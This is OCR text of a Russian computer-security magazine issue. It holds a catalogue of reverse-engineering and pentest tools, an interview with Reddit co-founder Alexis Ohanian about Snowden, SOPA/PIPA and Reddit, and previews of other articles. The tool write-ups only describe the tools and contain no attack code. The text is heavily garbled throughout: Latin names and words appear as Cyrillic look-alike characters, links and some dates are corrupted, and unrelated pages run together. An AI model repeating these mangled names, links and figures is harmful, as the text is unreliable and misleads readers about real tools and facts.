встроенный С-подобный язык для 
автоматизации рутинных про- 
цессов и публичный репозиторий 
скриптов ( с!ск.ги/8іхіі ) и форматов 
данных ( с!ск.ги/8іх1 : и ). 




« 074 ?- 

НЕХ-ВАУ8 

із.дсІ/іуиІРН 

Первый в мире коммерческий 
декомпилятор, показавший, что 
декомпиляция низкоуровневого 
представления в С-подобный язык 
не просто возможна, но и при- 
менима для ускорения процесса 
реверсинга. Является расшире- 
нием над ЮА Рго и поддерживает 
только две платформы: х86 и АРМ. 
Есть поддержка расширений для 
повышения эффективности ана- 
лиза или добавления новых фич. 
Конечно, дизассемблер не заменит, 
но в некоторых случаях позволяет 
существенно упростить жизнь при 
анализе больших объемов кода. 




- 075 - 

С40ЕС0МРІІ.ЕВ 

із.дсІ/ІѲбООѴ 

С40есотріІег — бесплатный 
декомпилятор, поддерживающий 
платформы х86 и х64. Осуществля- 
ет декомпиляцию в С-подобный 
язык, но на данном этапе проигры- 
вает по качеству декомпиляции 
Нех-Рауз Оесотрііег. Поддержива- 
ет интерактивное редактирование 
результатов декомпиляции во 
встроенном редакторе, но не под- 
держивает возможности разработ- 
ки пользовательских расширений. 
Радует, что тулза все-таки развива- 
ется, и, возможно, очень скоро мы 
получим достойную альтернативу 
платному Нех-Рауз Оесоплрііег. 
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-07В- 

ОНУРВС 

із.дсІ/ОСИИуі 

32-битный низкоуровневый отлад- 
чик с продуманным интерфейсом и 
функционалом. Первая же версия 
оказалась бомбой, так как все поль- 
зовались ЗоТІ: Ісе, у которого даже 
установка, в частности на ѴѴіпсІоѵѵз 
ХР, была проблемой. В ОІІуРВС есть 
анализатор, который распознает и 
подсвечивает процедуры, циклы, 
константы и строки, внедренные 
в код, обращение к функциям АРІ, 
параметры этих функций и т.п. 
Плагины упрощают как реверсинг 
(например, убрать детект отладчи- 
ка), так и процесс отладки. 




- 077 - 

ІММШІІТѴОЕВиССЕП 

із.дсѴІрЛэсІЕ 

Популярный мод ОІІуРЬд от компа- 
нии ІплтипИу. Является результатом 
скрещивания Ольки и интерпре- 
татора РуІІіоп. Имея в арсенале 
интегрированный скриптовый язык, 
можно отслеживать значения пере- 
менных и автоматически выполнять 
действия, что в итоге упрощает по- 
иск багов и сокрушение защит. АРІ 
уже включает в себя массу полез- 
ных утилит и функций, специально 
заточенных для хакерских нужд. 
Взять, к примеру, зеагсНсгурІ.ру — 
для поиска криптоалгоритмов, или 
топа. ру — упрощающего эксплуа- 
тацию найденных уязвимостей. 




- 078 - 

ѵѵіыовс 

із . д сі/п 2ХХ62 

Отл адч и к ѴѴі п сіоѵѵз - п р и ложен и й , 
драйверов и ядра от МісгозоИ 
Поддерживает кучу расширений. 
Одним из самых популярных 
аддонов является !ехрІоі1:аЫе, 
который позволяет автоматически 
оценить возможность эксплуатации 
уязвимости. Расширение часто 
используют для быстрого анализа 
падений программы или в связке с 
различными фаззерами для авто- 
матизации поиска именно интерес- 
ных ошибок. Другое расширение 

— рукб — добавляет поддержку 
любимого РуІІіоп. 




- 079 - 

сов 

із.дсІ/рОЗуРр 

Стандартная софтина для отладки 
в мире *піх. Утилита подходит как 
для отладки обычных программ, 
так и при работе с ядром. По срав- 
нению с отладчиками под ѴѴіпсІоѵѵз 
дсІЬ может показаться не самым 
удобным инструментом. Но дан- 
ную проблему в последнее время 
можно решить с помощью рас- 
ширения ѴоИтоп. А с появлением в 
версии 7 поддержки встроенного 
языка РуШоп работа стала совсем 
сказкой. Поэтому не бойся дсІЬ и 
шаг за шагом изучай его. Иначе в 
бинарном мире *піх тебе никак не 
выжить. 



ВСЯКАЯ 

ВСЯЧИНА 

Для пентестов написано такое количество утилит, 
что иной раз даже классифицировать их стано- 
вится сложно. Поэтому в последнем разделе мы 
собрали кашу малу из полезных инструментов. 




КАП ШШХ 

із.дсІ/еМкРОТ 



Каіі І_іпих, ранее известный как Васкітаск, — самый популяр- 
ный и динамично развивающийся дистрибутив, предназна- 
ченный для проведения тестов на проникновение. Каіі цели- 
ком и полностью состоит из одних зесипіу-инструментов, 
которые удобно сгруппированы по типу. Цифры действи- 
тельно впечатляют: всегда иметь под рукой около 300 
установленных и настроенных утилит — это действительно 
круто. Помимо официально доступных для скачивания ізо- 
шника, из которого можно сделать загрузочную флешку, 
и образа виртуальной машины (которые теперь доступны 
и для АРМ -архитектуры, что само по себе уже очень инте- 
ресно), есть еще сборки, сделанные умельцами из среды 
разработчиков дистрибутива, заточенные под конкретные 
девайсы: Затзипд СІіготеЬоок АРМ, ОбгоісІ 112, РазрЬеггу 
Рі, Саіаху КІоіе. В общем-то, для таких маленьких девайсов 
лучшей операционной системы и не придумать. 
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РШ1 - 

сша 

сигі.ііахх.зе 

Консольная утилита, позволяющая 
взаимодействовать с множеством 
различных серверов по множеству 
различных протоколов (РТР, НТТР, 
ЗСР, ЮАР, РОРЗ, ІМАР, 5МТР..) с 
синтаксисом ШІ_. Часто использу- 
ется в различных СТР-состязаниях 
для быстрого написания эксплойта 
к веб-сервису. 




082 

ЫАСІОЗ 

із.дсІ/І_дод2Р 



Мощное средство для монито- 
ринга сетевых сервисов и хостов. 
Внимательно следит за указанными 
службами и удаленными хостами 
(загрузка процессора, использо- 
вание дискового пространства), 
периодически проверяя их фун- 
кциональность. 




— 083 — 

ЫІРРЕП 

із.дсІ/еѴбСде 

ІЧіррег предназначен для про- 
верки конфигурационных файлов 
огромного ряда девайсов от 
СІЗСО, Зипірег, СИескРоіпІ:, ІЧоііеІ, 
ЗОЫІСѴѴаІІ. После аудита выдает 
НТМЬотчет, в нем могут быть 
СІЗСО Іуре-7 пароли или другие 
шифрованные данные, которые 
можно скормить ЗоІіп-ТІіе-РІіррег. 






шшшш гшишл 

Г4* СогУд^ЛсГі НЯ 

ш 



2011 07 27 
7011 07 17 
2011 07 27 
2011 07 27 
2011 07 77 
2011 07 27 
2011 07 27 
2011 07 77 
2011 07 27 
2011 07 27 
7011 07 77 
7011 07 77 
2011 07 77 
2011 07 27 
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ыторыс зтцыыеь амирс/рср 

із.дсІ/ѴѴ874і2 Ссылка на сайт із.дсІ/ЭплСОСП 



Следующее поколение оригиналь- 
ной утилиты піор, предназначенной 
для сбора информации о сетевом 
трафике. Теперь инструмент об- 
ладает удобным, основанным на 
НТМІ_ 5 и Аіах, интерфейсом. А 
движок утилиты скромен в разме- 
рах, не кушает память и обладает 
отказоустойчивостью. 



$рІипк 



ІГК5П5ЭТГІ! 
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5РІЛЛІК 

із.дсІ/угІсІРУ 

Подсистема обработки машинных 
данных для сбора, индексации и 
использования данных, созданных 
твоей ИТ-инфраструктурой и физи- 
ческими, виртуальными и облачны- 
ми системами. Находи и устраняй 
неполадки, расследуй нарушения 
системы безопасности в считаные 
минуты, а не часы или дни. 



Своеобразная программная 
обертка, предназначенная для 
ЗЗЬкодирования между клиентом 
и сервером по любому протоколу, 
основанному на ТСР. ЦельзШппеІ 
— создание надежного шифрован- 
ного канала связи между двумя и 
более хостами в сетях, где возмож- 
на угроза прослушивания трафика. 




^ 088 ® 

ѴР8РКОХѴ 

із.дсІ/ЬЬЗсІКЬ 

Программа для туннелирования 
НТТР/НТТРЗ-трафика через РНР- 
гейт. Заливаем на сайт файл даіе. 
рНр (предварительно установив 
пароль и ключ шифрования). В 
программе добавляем ШІ_, пароль, 
ключ шифрования. Нажимаем Зіагі: 
и настраиваем браузер на работу 
через прокси ІосаІТіоз1;:2222. 



Свободная альтернатива набору 
криптографического ПО РСР и 
полностью с ним совместимая. 
Может применяться для шифрова- 
ния текста и файлов, подписывания 
документов электронной цифровой 
подписью и проверки чужих под- 
писей, создания списков открытых 
ключей и управления ими. 




* 091 - 

ТГШЕСКѴРТ 

із.дсІДІІоЬх 

Криптосистема с открытыми ис- 
ходниками. Позволяет создавать 
виртуальный зашифрованный 
логический диск, хранящийся в 
виде файла. С помощью ТгиеСгурІ: 
также можно полностью шифровать 
раздел жесткого диска или иного 
носителя информации, например 
флешки. 





ФРЕМѴРИ 
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ЫЕТ8САГІТООІ.8 

із.дсІ/4дОѴѴШ 

Набор из около 40 сетевых утилит 
для винды, включающий в себя 
инструменты для работы с 0145, 
сканер портов, утилиты ріпд и 
1тасегои1:е и им подобные. Имеет 
несколько версий, которые разнят- 
ся по цене и числу инструментов. 
Самая простая содержит указанные 
выше + утилиту ѴѴІіоіз. 



- 089 - 

ТОН 

із.дсІ/ЮиІ4е 

Популярное решение, позволяю- 
щее сохранять анонимность при 
серфинге в Сети, шифруя весь 
свой трафик. Но это еще не все, Тог 
позволяет поднять свой «аноним- 
ный» веб-сервис, который будет 
находиться внутри его сети и будет 
доступен только ее пользователям. 



- 092 - 

ОРЕЫѴРЫ 

із.дсІ/иЗоѴСр 

Решение, обеспечивающее под- 
держку сетей ѴРІЧ, с гибкими 
возможностями конфигурирова- 
ния. Может использоваться для 
объединения двух и более частных 
сетей посредством создания шиф- 
рованного туннеля «поверх» небез- 
опасных каналов связи. Стабильно 
и кросс-платформенно. 
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100 программ для хакера 
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МАІТЕСО РѴТНОГІ/РЕШ./ВА8Н ѴШТІІАІ.ВОХ 

із.дсІ/кАТплІ_2 із.дб/ТхІСМА Ссылка на сайт 



Очень грамотный инструмент для 
сбора информации о людях, кон- 
тактных данных, адресах электрон- 
ной почты, ресурсах и так далее. 
Можно сказать, это мини-клон 
известного проекта по баіа-ппіпіпд'у 
Раіегѵа. Система способна искать 
даже отдельные фразы, словно 
поисковик. 



Хакеру не обойтись без знания 
скриптового языка Руѣіпоп, РуЬу, 

РегІ или даже просто ВазН. То надо 
отпарсить что-нибудь, то быстрень- 
ко накидать сплоит для найденной 
уязвимости. Тут-то и приходится 
задействовать всю мощь скрипто- 
вых языков. Какой из них выбрать 
— тебе решать. 



Парк виртуальных машин — при- 
вычное дело для многих из нас. 
ѴігІиаІВох с самого начала был 
бесплатен и с самого начала 
предоставлял такие возможности 
по виртуализации любых опера- 
ционных систем, что смотреть на 
платные решения не возникает ни 
малейшего желания. 



О А □ -и-О-И-к-*- 
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ОВАОІ8 

і$.дсІ/ѵШПМд 

Клиент-серверная платформа для 
удобного обмена информацией в 
ходе взлома. Когда целая команда 
занимается одним проектом, будет 
очень кстати иметь под рукой базу 
с информацией об уже проделан- 
ной работе. Хотя бы для того, чтоб 
не повторять неудачных попыток. 
СоІаЬогаІіоп для пентестеров! 




ТНЕ$1_Е1ЛН КІТ 

із.дсІ/пѵѵН 1 ст 

Библиотека и набор консольных 
программ, предназначенных для 
проведения криминалистической 
экспертизы на произвольных 
файловых системах. При помощи 
этого инструмента можно найти и 
восстановить удаленные данные из 
образов, снятых во время рассле- 
дования или с работающих систем. 




«100р 

ѴѴЕВСОАТ 

із.дсІ/А 7 СІѴШ 

Решил поднабраться навыков в 
пентестинге веб-приложений? 
Тогда тебе точно пригодится 
МеЬСоаТ Проект представляет со- 
бой специальную платформу, со- 
держащую уязвимые приложения, 
на которых можно отточить свои 
навыки в поиске и эксплуатации 
50І_-инъекций, Х55. 










095 ^ 

8Ѵ8ШТЕВЫАІ.8 

із.дсІ/дѵгхШ 



Набор известных системных утилит 
от Марка Руссиновича. Включает 
в себя такие известные инстру- 
менты, как Аиіогипз — менеджер 
автозагрузки, РедМоп — монитор 
обращений к реестру, РіІеМоп — 
монитор обращений к файловой 
системе, Ргосезз Ехріогег — менед- 
жер процессов и другие. 




— 098 — 

ПЕНСЕ 

із.дсІ/пѵѵНІст 

При обычном сканировании 
большой сети можно «потерять» 
часть хостов, если она состоит из 
нескольких диапазонов. Ріегсе по- 
может это исправить. Он представ- 
ляет собой обычный РегІ-скрипт, 
который быстро сканирует домены, 
используя при этом несколько раз- 
личных тактик. 



В создании этой подборки участвовали 
наши друзья ѵѵііііеііаі’ы России. 

Тарас Иващенко, «Яндекс» 
Арсений Реутов, РозШѵеТесМпоІодіез 
Михаил Фирстов, РозШѵеТесІппоІодіез 
Андрей Петухов, ЗоІісНаЬ 
Александр Матросов, ЕЗЕТ 
Иван Новиков, ОИзес І_аЬ 
Дмитрий Евдокимов, Оідііаі Зесигііу 
Алексей Тюрин, Оідііаі Зесигііу 
Борис Рютин, ЦОР (еЗаде ІаЬ) 
Антон Жуков, журнал «Хакер» 
Степан Ильин, журнал «Хакер» 
Алексей Синцов, ІМокіа 
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Интернет для хороших людей 



З 1 




ДЛЯ ХОРОШИХ 
ЛЮДЕЙ 

АЛЕКСИС ОГАНЯН, Б ” жд " с ' 

СООСНОВАТЕЛЬ ВЕЦЦІТ 



«Мы годами говорили о том, что с интернетом происходят странные вещи, и только сейчас 
услышали», — сетует мой собеседник. 30-летний Оганян — интернет-активист, выступавший 
от лица индустрии в конгрессе США, чтобы доказать, что БОРА и РІРА, законы о борьбе с пират- 
ством, убьют бизнес и свободу слова в Сети. В прошлом он приложил руку к созданию куль- 
тового сайта Весісііі, интернет-сообщества, выжившего в эпоху социальных сетей и ставшего 
целым явлением в сетевой культуре. Сейчас Оганян работает в знаменитом венчурном фонде 
У СотЬіпаІюг. А потому, выступая на ТЕО и стартап-тусовках, Алексис представляется просто: 

«Я из интернета». В Москву Оганян приехал, чтобы выступить на конференции Ве1:а ѴѴеек, но 
правительство США подкинуло нам более важную тему. Благодаря бывшему сотруднику ЦРУ 
Эдварду Сноудену мир узнал о существовании программы РРІЗМ, позволяющей правительству 
следить за всем, чем занимаются интернет-пользователи. 



Я считаю, что Эдвард Сноуден — патриот, а не преда- 
тель. Правительство совершило ошибку, когда решило осудить 
его. Я понимаю, что ситуация сложная. Все это началось при Джор- 
дже Буше, когда все боялись терроризма, эта программа ни респу- 
бликанская, ни демократическая, но это не отменяет проблемы. 
Но в итоге Обама сказал, что все это прекратит, — так что Сноуден 
сделал большое дело. 

Люди из мира технологий и борцы за гражданские 
права десятилетиями твердили: давайте разберемся, ка- 
кие у нас есть права в интернете. Случались какие-то локальные 
скандалы, кто-то протестовал, но никто не обращал внимания. 
Сейчас все по-другому. Я впервые вижу, что большинство аме- 
риканцев недовольно тем, что происходит. Печально, что это за- 
няло так много времени, но зато мы наконец пришли к публичной 
дискуссии. 

Американцев оскорбила история с РКІ5М потому, 
что в нашей конституции границы личного проведены 
абсолютно четко. Последние сто лет в США было незаконно 
читать чужую бумажную почту, чем электронная почта отличает- 
ся? Все больше людей начинают понимать эту взаимосвязь. Если 
вы хотите читать мою электронную почту, вам понадобится раз- 
решение. 

Но как Сноудену удалось донести до всех суть проис- 
ходящего? Он смог диктовать то, как будет рассказана его исто- 
рия. Это сила интернета и сегодняшних медиа. 10-15 лет назад 
эту историю делали бы репортеры СІЧІЧ или ВВС. Они бы взяли его 



неудачное фото, нашли бы цитаты в интернете, где он несет бред, 
и создали бы портрет человека, которому вряд ли поверило бы 
большинство американцев. 

А Сноуден просто взял и снял видео. Он был совершен- 
но спокоен, говорил четко и ясно. На нем была хорошая рубашка, 
он выглядел как парень, которому можно доверить заниматься тво- 
ими налогами. Дружелюбный парень, с которым ты был бы не про- 
тив сидеть рядом в автобусе. И он говорит: «Я хочу, чтобы амери- 
канцы сами решали, согласны ли они». 

Конечно, журналистам все равно удается повлиять 
на то, как освещается его история. Например, некоторые 
подчеркивают, что он вылетел из университета. Подают это так, 
словно это что-то меняет. «Этот парень даже в вузе не смог доу- 
читься, вот дебил!» А две недели назад в Нью-Йорк прилетал Дэвид 
Карп (создатель ТитЫг. — Прим, ред.), который тоже недоучился, 
о нем говорят то же, но его при этом делают вундеркиндом. 

Но тем не менее с помощью интернета Сноуден смог 
донести свое послание до миллионов так, как считал нуж- 
ным. Он сам сформировал первое впечатление о себе. «Знаете 
что? Все мы взрослые люди. Я обнаружил кое-что неприятное и хочу 
поделиться этим с моими согражданами». Это меня восхищает. 

Я убежден, что большинство людей хорошие и верят 
в правильные вещи. И вместе мы можем повлиять на проис- 
ходящее при помощи интернета и сайтов вроде ПесІсШ. Благодаря 
им мы можем быстрее распространять информацию и быстрее 
менять мир. 



ФАКТЫ 

Занимается венчурными 
инвестициями в фонде 
УСотЬіпаіог. 

Руководит онлайн-мага- 
зином Вгеасірід, который 
жертвует прибыль 
на благотворительность. 

Активист, выступал 
перед конгрессом США 
против 50РА и РІРА. 

В 2010 и 2012 годах 
попал в список РогЬез 
«30 влиятельных людей 
младше 30 лет». 

Любит путешествовать. 
В России побывал впер- 
вые, но до этого бывал 
в Грузии, Чехии, Латвии 
и прожил три месяца 
в Ереване. 




Зг 



Интервью 



Всегда есть лидеры, о которых говорят, 
им воздвигают памятники, о них мы 
читаем в учебниках истории . Но вся сила 
лидеров — в людях, которые идут за ними 



Даже в Европе, страна за страной, люди выходили 
и протестовали против этих биллей. Это и есть демократия. 
Демократия основана на идее, что у людей есть право голо- 
са. А теперь ясно, что даже в странах с менее демократическим 
режимом технологии помогают людям проявить свою позицию. 

Не менее интересная история произошла с БОРА 
(Біор Опііпе Ргіѵасу Асі) и РІРА (Ргоіесі: ІпіеІІесіиаІ 
РгореПу Асі). Индустрия развлечений потратила 94 
миллиона, чтобы пролоббировать эти законы. Внезапно 
все согласились друг с другом. ЗОРА и РІРА понравились и респу- 
бликанцам, и демократам. Это заняло считаные месяцы, букваль- 
но месяцы. Все эксперты в Вашингтоне были уверены, что ЗОРА 
и РІРА пройдут. Расходитесь по домам, все уже решено. Но все из- 
менилось от «неизбежного» до «немыслимого» всего за несколько 
месяцев. 

Если бы БОРА и РІРА были приняты, мы бы не смогли 
заниматься РесІсШ. С подобным я смириться не мог. 

Я ушел из компании Ніртипк (сервис для поиска би- 
летов и гостиниц. — Прим, ред.) в 2011-м, чтобы бороть- 
ся против БОРА и РІРА, и тогда я еще не был связан с по- 
литикой. Но я стал ходить в Вашингтон, общаться с сенаторами... 
И быстро понял, какие ресурсы были брошены в поддержку этих 
законов. 

В Ніртипк я занимался маркетингом, РП, построени- 
ем чего-то вроде сообщества. Я считал, что все это не слиш- 
ком важно. Если я уйду, никто не умрет. Стив и Адам как-то рабо- 
тали там без меня до этого, справятся и теперь. Было бы просто 
нечестно по отношению к Ніртипк, если бы я остался в компании, 
когда на самом деле я почти все время занимался совсем другими 
вещами. 

Если бы не интернетчики, закон был бы уже при- 
нят. Это произошло не благодаря ПебсІіЦ ТитЫг, РасеЬоок или 
ТѵѵіМег, а благодаря людям, использующим эти платформы. У них 
была мотивация, они распространяли информацию, они стали 
принимать участие в политике. И это дало мне надежду, боль- 
шую надежду. 

В конечном счете каждое серьезное изменение 
в мире произошло благодаря безымянным людям. Всег- 
да есть лидеры, о которых говорят, им воздвигают памятники, о них 
мы читаем в учебниках истории. Но вся сила лидеров — в людях, 
которые идут за ними. 

О СОЗДАНИИ НЕРОІТ 

За последний месяц Несісііі: посетило 70 миллионов 
пользователей. Для сравнения: в Германии живет 80 миллио- 
нов. И у нас тысячи разделов обо всем на свете. Одному Му ШІе 
Ропу посвящены дюжины сабреддитов, в которых эти игрушки об- 
суждают во всех мыслимых вариантах. 

На то, чтобы произвести впечатление на посетителя, 
дается лишь пять секунд. Поэтому, когда мы занялись всем 
этим в 2005 году, больше всего мы боялись, что наш сайт не оце- 
нят. Люди уйдут, нажмут кнопку «Назад», если увидят красивый сайт 
со сглаженными углами, но без хорошего контента, так что мы ре- 
шили дать им контент. 

Мы не были гениальными дизайнерами, а потому ре- 
шили: почему не сделать все максимально просто? Типа: 
а вот он, контент. Как такого достичь? Так и получился наш фирмен- 
ный дизайн: белый фон, куча ссылок и текста. Теперь все это стало 
частью бренда Небсііі, и что-либо менять уже сложно. 

Но можете посмотреть на зиЬгесІсІіІз, множество 
зиЬгесІсІіІз, созданных пользователями. К примеру, один 
фанат американского футбола сделал очень красивый дизайн сво- 
его зиЬгесІсІіЦ там остались привычные ссылки и все остальное, 
но есть и... шик, которого нету Пебсііі. Если ты фанат американско- 
го футбола и зайдешь на этот зиЬгесІсІіІ, то, что ты там увидишь, бу- 
дет выглядеть очень здорово. И если твой друг спросит: «Как у тебя 



глаза от реддита не вытекают?», ты от- 
ветишь: «О чем ты? Да он классно вы- 
глядит». 

У каждого сообщества своя 
культура и жизнь, я даже не знаю, 
что там происходит. Это преврати- 
лось в огромную платформу. Удиви- 
тельно наблюдать за тем, как все это 
развивается. 

После слияния с Сопсіе ІЧазі 
(в 2006 году. — Прим, ред.) многие ожидали провала. 

Если бы я наблюдал за этим со стороны, я бы и сам подумал: «Эм, 
ну удачи вам, ребята». Просто так всегда происходит с технически- 
ми поглощениями. Даже если одна техническая компания погло- 
щает другую, все может зафейлиться. Вон, посмотрите, сколько 
трупиков у ѴаЬоо! Там и Эеіісіоиз, и РІіскг. РІіскг сейчас вроде бы 
возвращается, но не слишком успешно. 

ѴоиТиЬе — яркое исключение. В Ѳоодіе сказали: «ОК, 
у вас, ребята, свои дела, а мы убьем Соодіе Ѵібео и сделаем ставку 
на ѴоиТиЬе, только не облажайтесь». 

Сопсіе ІЧазІ не техническая компания, они далеки 
от этого. Главное, они сами это понимали. Они честно сказали: 
«Стив, Алексис, мы доверяем вам, не зря же мы вас купили. Мы 
не будем вмешиваться». И вот мы со Стивом здесь, три года спустя. 

Корпоративность иногда выбешивает, но в целом все 
прошло безболезненно. Во рту по-прежнему не появилось 
дурного привкуса, я получил ценный опыт в Сопсіе ІМазЬ Немногим 
основателям подобное нравится, но это ценный урок для всех по- 
глощающих компаний: не пытайтесь все испортить, не пытайтесь 
подавить. 

На протяжении нескольких лет мы говорили о том, 
что заботимся о наших пользователях. Мы не хотели на- 
вязывать им рекламу или вход через РасеЬоок, но именно так по- 
ступали наши конкуренты. А мы просто хорошо относились к поль- 
зователям. Создавали хороший контент. И мы сами пользовались 
своим сайтом каждый день. 

Сопсіе Ыазі почти не вмешивались. Хотя Весісій тогда 
не приносил прибыли, в компании с этим не спешили. Я счи- 
таю, наша главная победа в том, что мы могли делать с сайтом 
что угодно. 

У нас всегда были маленькие затраты и маленькая 
команда. Всегда было четкое разделение обязанностей. Стив 
отвечал за инфраструктуру Весісііі, за все технические вопросы. 
Я бродил по разделам, делал какие-то пометки, предлагал какие- 
то идеи, но последнее слово в вопросах технологий оставалось 
за Стивом. Зато все нетехнические вопросы, то есть не слишком 
веселые штуки, вроде общения с адвокатами, ответов на письма 
и покупки китайской еды на ужин, — на мне. Самое интересное во 
всем этом для меня — создание сообществ, дизайна Весісііі, кото- 
рый полюбили люди, и разного рода маркетинг. 

КесІсШ был написан на 1_ізр. Тогда Стиву нравился І_ізр, 
не знаю, как сейчас. Он начал программировать еще в колледже. 
Я тоже где-то неделю пытался научиться Ызр, но вышло не очень. 
Тогда мы переключились на РуШоп. Не могу рассказать больше, так 
как, увы, ни черта не смыслю. Это вопрос к Стиву :). 

Когда мы со Стивеном ушли, команда переста- 
ла понимать, что нужно делать. Полагаю, просто потому, 
что они не были основателями компании. Люди начали уходить. 
Был период, когда очевидно нужны были деньги... Но сейчас 
Несісій независим (в 2011 году разработчики выделились в от- 
дельную компанию), я очень рад этому, потому что он перерож- 
дается как независимая компания. Сопсіе І\Іаз{ принадлежит ее 
часть, но не более. Я верю, что ПесІсІИ: вырастет в нечто большее. 
Продолжит расти и набирать силу в мире. Им нужно расти, нуж- 
но сделать еще очень и очень многое. Но в ближайший год-два, 
я считаю, важнее всего решить вопрос с интернационализацией. 
НесІсІіІ — это очень простой сайт, ссылки, текст... в общем, вещи, 
которые очень легко перенести, всем понятные и простые в ис- 
пользовании. 

Когда я ездил в Египет два года назад, я с удивле- 
нием узнал, что там все еще очень популярны форумы. 

Старые рЬрВВ, веб-форумы все еще используются для тех вещей, 
для которых уже существует ВесШ. И я бы хотел, чтобы в мире 
ни одно онлайн-сообщество больше не использовало эти нелепые 
форумы для обмена ссылками и обсуждений и люди пользовались 
зиЬгесІсІіІз. 



ЦИФРЫ 

В 2005 году основан 
ВесШ. 

Только в прошлом 
месяце Вебсііі посетил 
70 017 371 уникальный 
пользователь из 183 
стран мира. 

В 2013 году впервые 
в сессии вопросов-отве- 
тов в АМА поучаствовал 
президент США Барак 
Обама. 

Более 50 тысяч сайтов 
ушлив«ЫаскоиІ» 
на целый день 1 8 января 
201 2 года в знак протеста 
против законопроектов 
80РА и РІРА. Среди них 
были ВесШ, английская 
ѴѴікіресІіа и многие дру- 
гие. Баннер с призывом 
остановить законопроек- 
ты увидели более 
160 миллионов человек. 



Еще лет пять назад у КесІсШ было несколько клонов 
и конкурентов, но они все исчезли, довольно быстро 
умерли. Самый известный «похожий сайт» — Эідд (был запущен 
в 2004 году. — Прим, ред.) много раз менялся, продавался и пере- 
продавался и прекратил свое существование в изначальном виде. 
Думаю, если русский или француз будут искать подобный сайт... 
в итоге им окажется проще зайти на Несісііі. 

Вообще, я считаю, что клоны сделали нас лучше в пла- 
не бизнеса. Мы — создатели, которым действительно есть что ска- 
зать, и я не против приложить для этого больше усилий. Если вы 
хотите стать следующими Соодіе или быть на том же уровне, у вас 
должен быть стимул расти, стать больше чем просто копией. 

Сейчас главное дело для меня, пожалуй, инвестиро- 
вание. Я много этим занимаюсь. Инвестиции дают привилегию 
поработать с выдающимися основателями. Работа с хорошими 
людьми не воспринимается как работа. Это весело, это нечто но- 
вое каждый день. 

О ГРЯДУЩЕЙ КНИГЕ 

А еще я пишу книгу. Она называется «Без разрешения» (ѴѴіШоиі 
регтіззіоп). Книга о том, что интернет — это не только бизнес, 
но и благотворительность, искусство, политическая активность. 
Мне повезло быть вовлеченным во все эти вещи, и я хотел расска- 
зать об этом. О том, каково быть их частью, каково смотреть на них 
со стороны. Лучшая часть книги — это истории других людей, с ко- 
торыми я познакомился просто потому, что на их ноутбуках есть 
подключение к интернету. Я воспринимаю это как часть культуры. 

Книга выходит 1 октября в Соединенных Штатах 
и в Канаде. Мы пока не продали международные права, но обя- 



Инвестиции дают привилегию порабо- 
тать с выдающимися основателями . 
Работа с ними не воспринимается как ра- 
бота. Это нечто новое каждый день 



ЦИФРЫ 

94 миллиона долларов 
потратили представи- 
тели индустрии развле- 
чений налоббирование 
ЗОРАи РІРА в сенате, 
утверждает Оганян. 

Более 10 позиций в по- 
исковой выдаче потерял 
доменный регистратор 
и хостер ОоБасІсІу после 
того, как высказался за 
принятие ЗОРАи РІРА. 
Об оттоке клиентов не- 
чего и говорить. 



зательно выйдем на международный уровень. С радостью съезжу 
в международное турне, используя книгу, как предлог, чтобы боль- 
ше путешествовать :). 

Я хотел написать эту книгу еще для того, чтобы 
повлиять на студентов. Я планирую совершить тур по 50 
колледжам. Я люблю приезжать в колледжи, люблю говорить 
о предпринимательстве, о «предпринимательском мышлении», 
потому что с точки зрения экономики — это идеальный выход 
для Америки. 

Даже если ты не хочешь быть предпринимателем, 
природа интернета заставит тебя учиться. Лучшие про- 
граммисты не знают всех функций языка, им приходится искать ин- 
формацию, чтобы начать; великие фотографы ищут работы других 
великих фотографов для вдохновения. 

В школах этому не учат. Чтобы выйти на следующий уро- 
вень, студентам предлагают проставить галочки в нужных местах, 
получить правильный ответ, хорошую оценку, войти в рейтинг. 
Но если даже после окончания учебы ты все еще просто расставля- 
ешь галочки, тебе будет очень-очень трудно в новом мире, потому 
что все время придется что-то предпринимать. ЗЕ 





Ргеѵіеѵѵ 

ПРИВОДИМ ѴѴІЫ00ѴѴ88 
В ЧУВСТВО 

МісгозоТІ: мало кого удалось убедить в светло-плиточном буду- 
щем сѴѴіпсіоѵѵз 8, и вряд ли ты побежал обновляться сразу после 
выхода «восьмерки». На дворе ѴѴіпсІоѵѵз 8.1 , в которой вроде 
как обещали пофиксить все основные проблемы новой ОС, 
но как можно судить по превью — не пофиксили. А людей, кото- 
рым по тем или иным причинам приходится работать с восьмер- 
кой, все больше — все-таки прошел уже год. Для них и приготов- 
лено это руководство, описывающее решения для всех основных 
болячек. 






ЛЮБОЙ СТРЕСС ЗА ВАШИ ДЕНЬГИ 

Разбираемся с возможностями и ограничениями 
веб-сервисов для нагрузочного тестирования 
твоих проектов. Посмотрим и на то, как такие 
сервисы могут быть использованы со злым 
умыслом. 



ВАСК ТО ТНЕ .811 

История о том, как в Советском Союзе делали 
компьютеры, клонируя самые разные архитек- 
туры, порожденные «загнивающим» Западом. 
Подробная ретроспектива моделей от СМ 
до «Микроши». 



ЯБЛОКО РАЗДОРА 

Пользователи ЮЗ сначала громко требовали ре- 
дизайна, а потом стали также громко требовать 
вернуть все назад. Тем не менее за ущербными 
иконками скрывается немало интересных новых 
функций. 




РОДСТВЕННЫЕ СВЯЗИ 

Учимся запускать любые Ыпих-приложения 
на устройствах под управлением АпбгоісІ. Не- 
смотря на близкое родство двух платформ, все 
проходит не всегда гладко. 



ОТЧЕТ С РНРАѴЗ 

Рассказ об одном из важнейших российских 
форумов для специалистов по инфобезопас- 
ности: главные выступления, мероприятия 
и события. 



ОІГГЗЮЕТНЕВОХ 

Как-то ВагаЬиз’у понравилась одна игра для ХЬох. 
И не понравилось, что ее нет для РС. Вот 
он и решил сделать то, что уже давно надо было 
сделать, — и поделился с нами подробностями. 












ПРОВЕРЕНО НА ЛЮДЯХ 
ИЗ НАШЕГО ЖУРНАЛА! 

Как редакторы ][ и им сочувствующие пробовали 
софт и гаджеты для здорового образа жизни 
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За какие-то десять лет собирательный образ нашего 
брата компьютерщика необыкновенно изменился. 
Патлатый социофоб в грязной майке МеіаІІіса ушел 
в прошлое, и его место занял подтянутый любитель 
фитнеса, журнала «Хакер» и зимних видов спорта. 
Современные технологии поддерживают эту тенден- 
цию как могут — интернет-сервисами, программами, 
гаджетами и вообще всем перечисленным, сплетен- 
ным в единую экосистему. Мы со Степаном решили 
не оставаться в стороне от прогресса и поставили 
на себе небольшой экспериментик. 



СУТЬ ЭКСП ЕРИ М ЕНТА: 

ЗАНИМАЛСЯ С ВИРТУАЛЬНЫМ ТРЕНЕРОМ 



ВЫБИРАЕМ КОНСОЛЬ 

Спортивные и фитнес-программы доступны на консолях Александр Лозовский 
